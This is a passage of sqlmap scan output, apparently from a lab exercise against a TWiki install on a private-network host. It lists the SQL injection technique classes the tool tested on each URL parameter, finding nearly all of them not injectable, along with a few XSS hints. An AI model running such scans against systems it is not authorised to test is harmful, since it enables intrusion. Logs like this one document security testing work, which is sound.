[18:46:50] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:46:51] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:46:51] [INFO] testing 'MySQL inline queries' | |
[18:46:51] [INFO] testing 'PostgreSQL inline queries' | |
[18:46:51] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:46:51] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:46:52] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:46:53] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:46:54] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:46:54] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:46:55] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:46:56] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:46:57] [INFO] testing 'Oracle AND time-based blind' | |
[18:46:58] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:46:58] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:47:09] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:47:19] [WARNING] GET parameter 'rev1' is not injectable | |
[18:47:19] [INFO] testing if GET parameter 'rev2' is dynamic | |
[18:47:19] [WARNING] GET parameter 'rev2' does not appear dynamic | |
[18:47:19] [WARNING] heuristic (basic) test shows that GET parameter 'rev2' might not be injectable | |
[18:47:19] [INFO] testing for SQL injection on GET parameter 'rev2' | |
[18:47:20] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:47:21] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:47:22] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:47:23] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:47:24] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:47:25] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:47:26] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:47:26] [INFO] testing 'MySQL inline queries' | |
[18:47:26] [INFO] testing 'PostgreSQL inline queries' | |
[18:47:27] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:47:27] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:47:28] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:47:28] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:47:29] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:47:30] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:47:31] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:47:32] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:47:33] [INFO] testing 'Oracle AND time-based blind' | |
[18:47:33] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:47:45] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:47:55] [WARNING] GET parameter 'rev2' is not injectable | |
[18:47:55] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 54: | |
GET http://192.168.1.113:80/twiki/bin/view/Know/WebChanges?rev=1.2 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:47:55] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/Know/WebChanges?rev=1.2' | |
[18:47:55] [INFO] testing connection to the target URL | |
[18:47:56] [INFO] testing if the target URL is stable | |
[18:47:56] [INFO] target URL is stable | |
[18:47:56] [INFO] testing if GET parameter 'rev' is dynamic | |
[18:47:57] [WARNING] GET parameter 'rev' does not appear dynamic | |
[18:47:57] [WARNING] heuristic (basic) test shows that GET parameter 'rev' might not be injectable | |
[18:47:57] [INFO] heuristic (XSS) test shows that GET parameter 'rev' might be vulnerable to XSS attacks | |
[18:47:57] [INFO] testing for SQL injection on GET parameter 'rev' | |
[18:47:57] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:47:57] [WARNING] reflective value(s) found and filtering out | |
[18:47:59] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:47:59] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:47:59] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:48:00] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:48:00] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:48:01] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:48:01] [INFO] testing 'MySQL inline queries' | |
[18:48:01] [INFO] testing 'PostgreSQL inline queries' | |
[18:48:01] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:48:02] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:48:02] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:48:02] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:48:03] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:48:03] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:48:04] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:48:04] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:48:05] [INFO] testing 'Oracle AND time-based blind' | |
[18:48:05] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:48:05] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:48:13] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:48:20] [WARNING] GET parameter 'rev' is not injectable | |
[18:48:20] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
[18:48:20] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/Know/WebChanges?rev1=1.2&rev2=1.1' | |
[18:48:20] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Know/WebChanges?rev=1.1' | |
URL 55: | |
GET http://192.168.1.113:80/twiki/bin/oops/Know/WebChanges?template=oopsmore¶m1=1.3¶m2=1.3 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:48:20] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/oops/Know/WebChanges?template=oopsmore¶m1=1.3¶m2=1.3' | |
[18:48:20] [INFO] testing connection to the target URL | |
[18:48:20] [INFO] testing if the target URL is stable | |
[18:48:21] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on | |
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C | |
[18:48:21] [INFO] testing if GET parameter 'template' is dynamic | |
[18:48:21] [INFO] confirming that GET parameter 'template' is dynamic | |
[18:48:21] [INFO] GET parameter 'template' is dynamic | |
[18:48:21] [WARNING] heuristic (basic) test shows that GET parameter 'template' might not be injectable | |
[18:48:21] [INFO] heuristic (XSS) test shows that GET parameter 'template' might be vulnerable to XSS attacks | |
[18:48:21] [INFO] testing for SQL injection on GET parameter 'template' | |
[18:48:21] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:48:22] [INFO] heuristics detected web page charset 'ascii' | |
[18:48:22] [WARNING] reflective value(s) found and filtering out | |
[18:48:22] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:48:22] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:48:23] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:48:23] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:48:24] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:48:24] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:48:24] [INFO] testing 'MySQL inline queries' | |
[18:48:24] [INFO] testing 'PostgreSQL inline queries' | |
[18:48:24] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:48:24] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:48:25] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:48:25] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:48:25] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:48:26] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:48:26] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:48:26] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:48:27] [INFO] testing 'Oracle AND time-based blind' | |
[18:48:27] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:48:27] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:48:32] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:48:36] [WARNING] GET parameter 'template' is not injectable | |
[18:48:36] [INFO] testing if GET parameter 'param1' is dynamic | |
[18:48:36] [WARNING] GET parameter 'param1' does not appear dynamic | |
[18:48:36] [WARNING] heuristic (basic) test shows that GET parameter 'param1' might not be injectable | |
[18:48:37] [INFO] heuristic (XSS) test shows that GET parameter 'param1' might be vulnerable to XSS attacks | |
[18:48:37] [INFO] testing for SQL injection on GET parameter 'param1' | |
[18:48:37] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:48:38] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:48:38] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:48:38] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:48:39] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:48:39] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:48:40] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:48:40] [INFO] testing 'MySQL inline queries' | |
[18:48:40] [INFO] testing 'PostgreSQL inline queries' | |
[18:48:40] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:48:40] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:48:41] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:48:41] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:48:41] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:48:42] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:48:42] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:48:43] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:48:43] [INFO] testing 'Oracle AND time-based blind' | |
[18:48:44] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:48:50] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:48:56] [WARNING] GET parameter 'param1' is not injectable | |
[18:48:56] [INFO] testing if GET parameter 'param2' is dynamic | |
[18:48:56] [WARNING] GET parameter 'param2' does not appear dynamic | |
[18:48:56] [WARNING] heuristic (basic) test shows that GET parameter 'param2' might not be injectable | |
[18:48:56] [INFO] testing for SQL injection on GET parameter 'param2' | |
[18:48:56] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:48:57] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:48:57] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:48:58] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:48:58] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:48:59] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:48:59] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:48:59] [INFO] testing 'MySQL inline queries' | |
[18:48:59] [INFO] testing 'PostgreSQL inline queries' | |
[18:49:00] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:49:00] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:49:00] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:49:00] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:49:01] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:49:01] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:49:02] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:49:02] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:49:03] [INFO] testing 'Oracle AND time-based blind' | |
[18:49:03] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:49:09] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:49:16] [WARNING] GET parameter 'param2' is not injectable | |
[18:49:16] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 56: | |
GET http://192.168.1.113:80/twiki/bin/edit/TWiki/MeaningfulTitle?topicparent=TWiki.TextFormattingFAQ | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:49:16] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/TWiki/MeaningfulTitle?topicparent=TWiki.TextFormattingFAQ' | |
[18:49:16] [INFO] testing connection to the target URL | |
[18:49:16] [INFO] testing if the target URL is stable | |
[18:49:17] [INFO] target URL is stable | |
[18:49:17] [INFO] testing if GET parameter 'topicparent' is dynamic | |
[18:49:17] [WARNING] GET parameter 'topicparent' does not appear dynamic | |
[18:49:17] [WARNING] heuristic (basic) test shows that GET parameter 'topicparent' might not be injectable | |
[18:49:17] [INFO] testing for SQL injection on GET parameter 'topicparent' | |
[18:49:17] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:49:17] [WARNING] reflective value(s) found and filtering out | |
[18:49:18] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:49:18] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:49:19] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:49:19] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:49:20] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:49:20] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:49:20] [INFO] testing 'MySQL inline queries' | |
[18:49:20] [INFO] testing 'PostgreSQL inline queries' | |
[18:49:20] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:49:20] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:49:21] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:49:21] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:49:22] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:49:22] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:49:22] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:49:23] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:49:23] [INFO] testing 'Oracle AND time-based blind' | |
[18:49:24] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:49:24] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:49:29] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:49:35] [WARNING] GET parameter 'topicparent' is not injectable | |
[18:49:35] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 57: | |
GET http://192.168.1.113:80/twiki/bin/edit/TWiki/WikiStyleWord?topicparent=TWiki.TextFormattingFAQ | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:49:35] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/TWiki/WikiStyleWord?topicparent=TWiki.TextFormattingFAQ' | |
[18:49:35] [INFO] testing connection to the target URL | |
[18:49:35] [INFO] testing if the target URL is stable | |
[18:49:36] [INFO] target URL is stable | |
[18:49:36] [INFO] testing if GET parameter 'topicparent' is dynamic | |
[18:49:36] [WARNING] GET parameter 'topicparent' does not appear dynamic | |
[18:49:36] [WARNING] heuristic (basic) test shows that GET parameter 'topicparent' might not be injectable | |
[18:49:36] [INFO] testing for SQL injection on GET parameter 'topicparent' | |
[18:49:36] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:49:36] [WARNING] reflective value(s) found and filtering out | |
[18:49:37] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:49:37] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:49:38] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:49:38] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:49:39] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:49:39] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:49:39] [INFO] testing 'MySQL inline queries' | |
[18:49:40] [INFO] testing 'PostgreSQL inline queries' | |
[18:49:40] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:49:40] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:49:40] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:49:40] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:49:41] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:49:41] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:49:42] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:49:42] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:49:43] [INFO] testing 'Oracle AND time-based blind' | |
[18:49:43] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:49:43] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:49:49] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:49:55] [WARNING] GET parameter 'topicparent' is not injectable | |
[18:49:55] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 58: | |
GET http://192.168.1.113:80/twiki/bin/edit/TWiki/TextFormattingFAQ?t=1441456782 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:49:55] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/TWiki/TextFormattingFAQ?t=1441456782' | |
[18:49:55] [INFO] testing connection to the target URL | |
[18:49:55] [INFO] testing if the target URL is stable | |
[18:49:56] [INFO] target URL is stable | |
[18:49:56] [INFO] testing if GET parameter 't' is dynamic | |
[18:49:56] [WARNING] GET parameter 't' does not appear dynamic | |
[18:49:56] [WARNING] heuristic (basic) test shows that GET parameter 't' might not be injectable | |
[18:49:56] [INFO] testing for SQL injection on GET parameter 't' | |
[18:49:57] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:49:58] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:49:58] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:49:58] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:49:59] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:49:59] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:50:00] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:50:00] [INFO] testing 'MySQL inline queries' | |
[18:50:00] [INFO] testing 'PostgreSQL inline queries' | |
[18:50:00] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:50:00] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:50:01] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:50:01] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:50:01] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:50:02] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:50:02] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:50:03] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:50:03] [INFO] testing 'Oracle AND time-based blind' | |
[18:50:04] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:50:04] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:50:10] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:50:17] [WARNING] GET parameter 't' is not injectable | |
[18:50:17] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 59: | |
GET http://192.168.1.113:80/twiki/bin/search/TWiki/SearchResult?scope=text®ex=on&search=Text *Formatting *FAQ[^A-Za-z] | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:50:17] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/search/TWiki/SearchResult?scope=text®ex=on&search=Text *Formatting *FAQ[^A-Za-z]' | |
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y | |
[18:50:17] [INFO] testing connection to the target URL | |
[18:50:17] [INFO] testing if the target URL is stable | |
[18:50:18] [INFO] target URL is stable | |
[18:50:18] [INFO] testing if URI parameter '#1*' is dynamic | |
[18:50:18] [INFO] confirming that URI parameter '#1*' is dynamic | |
[18:50:18] [INFO] URI parameter '#1*' is dynamic | |
[18:50:18] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable | |
[18:50:18] [INFO] testing for SQL injection on URI parameter '#1*' | |
[18:50:18] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:50:18] [WARNING] reflective value(s) found and filtering out | |
[18:50:20] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:50:20] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:50:20] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:50:21] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:50:22] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:50:22] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:50:22] [INFO] testing 'MySQL inline queries' | |
[18:50:22] [INFO] testing 'PostgreSQL inline queries' | |
[18:50:22] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:50:22] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:50:23] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:50:23] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:50:24] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:50:24] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:50:24] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:50:25] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:50:26] [INFO] testing 'Oracle AND time-based blind' | |
[18:50:26] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:50:26] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:50:31] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:50:37] [WARNING] URI parameter '#1*' is not injectable | |
[18:50:37] [INFO] testing if URI parameter '#2*' is dynamic | |
[18:50:37] [INFO] confirming that URI parameter '#2*' is dynamic | |
[18:50:37] [INFO] URI parameter '#2*' is dynamic | |
[18:50:37] [WARNING] heuristic (basic) test shows that URI parameter '#2*' might not be injectable | |
[18:50:37] [INFO] testing for SQL injection on URI parameter '#2*' | |
[18:50:37] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:50:38] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:50:38] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:50:39] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:50:39] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:50:40] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:50:40] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:50:40] [INFO] testing 'MySQL inline queries' | |
[18:50:40] [INFO] testing 'PostgreSQL inline queries' | |
[18:50:41] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:50:41] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:50:41] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:50:41] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:50:42] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:50:42] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:50:43] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:50:43] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:50:44] [INFO] testing 'Oracle AND time-based blind' | |
[18:50:44] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:50:49] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:50:55] [WARNING] URI parameter '#2*' is not injectable | |
[18:50:55] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 60: | |
GET http://192.168.1.113:80/twiki/bin/view/TWiki/TextFormattingFAQ?skin=print | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:50:55] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/TWiki/TextFormattingFAQ?skin=print' | |
[18:50:55] [INFO] testing connection to the target URL | |
[18:50:55] [INFO] testing if the target URL is stable | |
[18:50:56] [INFO] target URL is stable | |
[18:50:56] [INFO] testing if GET parameter 'skin' is dynamic | |
[18:50:56] [INFO] confirming that GET parameter 'skin' is dynamic | |
[18:50:56] [INFO] GET parameter 'skin' is dynamic | |
